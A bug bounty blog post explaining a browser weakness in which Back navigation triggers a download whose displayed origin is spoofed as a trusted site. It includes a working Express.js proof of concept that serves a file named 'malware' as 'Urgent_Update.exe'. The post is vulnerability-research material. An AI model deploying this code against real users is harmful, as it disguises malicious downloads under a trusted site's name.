History Manipulation Enables Fake Downloads on Back Navigation (origin spoofing)


Hi, I want to share a tip for finding an origin-spoofing weakness in file downloads, using the technique History Manipulation Enables Fake Downloads on Back Navigation.
In short, it works like this:
A user visits the attacker's page and is then sent on to a trusted site such as google.com (in the PoC below this is a plain link; a real attack would redirect). When the user presses the browser's "Back" button to return to the previous site, a file download starts automatically.
The interesting part is that if you open the browser's download history, the file appears to have come from google.com (or whichever trusted site was used), when in fact it was served by the attacker's server. This can be considered a valid finding because the download's displayed origin is spoofed.
Why the Back navigation produces a download: the server remembers that it has already served the landing page once. Every response carries Cache-Control: no-store, so the browser does not restore the page from its cache on Back but requests /index.html again. That second request is answered with a redirect to /data, which is sent with Content-Disposition: attachment, so the browser saves a file instead of rendering a page. Whether Back really re-fetches the page rather than restoring it from the back/forward cache, and how the download UI labels the source, differs between browsers and versions, so confirm the behaviour in the browser you are reporting against.
Here is the source code, so you can try it yourself:
node.js
const express = require('express');
const fs = require('fs');
const path = require('path');

const app = express();
const PORT = 3000;

// Single global flag: set when a visitor hits "/", cleared once index.html
// has been served. It is shared by all clients, which is fine for a
// one-person PoC but means concurrent visitors can flip each other's state.
let redirect = false;

app.get('/', (req, res) => {
  // Arm the PoC and send the browser to the landing page.
  redirect = true;
  res.setHeader('Cache-Control', 'no-store');
  res.redirect('/index.html');
});

app.get('/index.html', (req, res) => {
  // no-store keeps the browser from restoring this page from cache on Back,
  // so the Back navigation reaches the server as a fresh request.
  res.setHeader('Cache-Control', 'no-store');
  if (redirect) {
    // First load: serve the page containing the link to the trusted site.
    redirect = false;
    res.sendFile(path.join(__dirname, 'index.html'));
  } else {
    // Second load (the Back navigation): redirect to the download instead.
    res.redirect('/data');
  }
});

app.get('/data', (req, res) => {
  // Serves the file named "malware" in this directory as an attachment.
  const filePath = path.join(__dirname, 'malware');
  if (!fs.existsSync(filePath) || fs.statSync(filePath).isDirectory()) {
    return res.status(404).send('File not found');
  }
  res.setHeader('Cache-Control', 'no-store');
  res.setHeader('Content-Type', 'application/octet-stream');
  res.setHeader('Content-Disposition', 'attachment; filename="Urgent_Update.exe"');
  fs.createReadStream(filePath).pipe(res);
});

app.listen(PORT, () => {
  console.log(`Server running on http://localhost:${PORT}`);
});
index.html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Back</title>
</head>
<body>
  <h1>POC SITE</h1>
  <a href="https://google.com">google.com</a>
</body>
</html>
Written by zeeagil
Hi, I’m a bug bounty hunter and cybersecurity enthusiast who began my journey in 2023. I enjoy exploring and discovering hidden vulnerabilities in browsers, applications, and various platforms—especially those that are rarely examined by others. My focus is on browser and website security issues. I also share my findings and educational content through my YouTube channel, Lazy Cyber Security.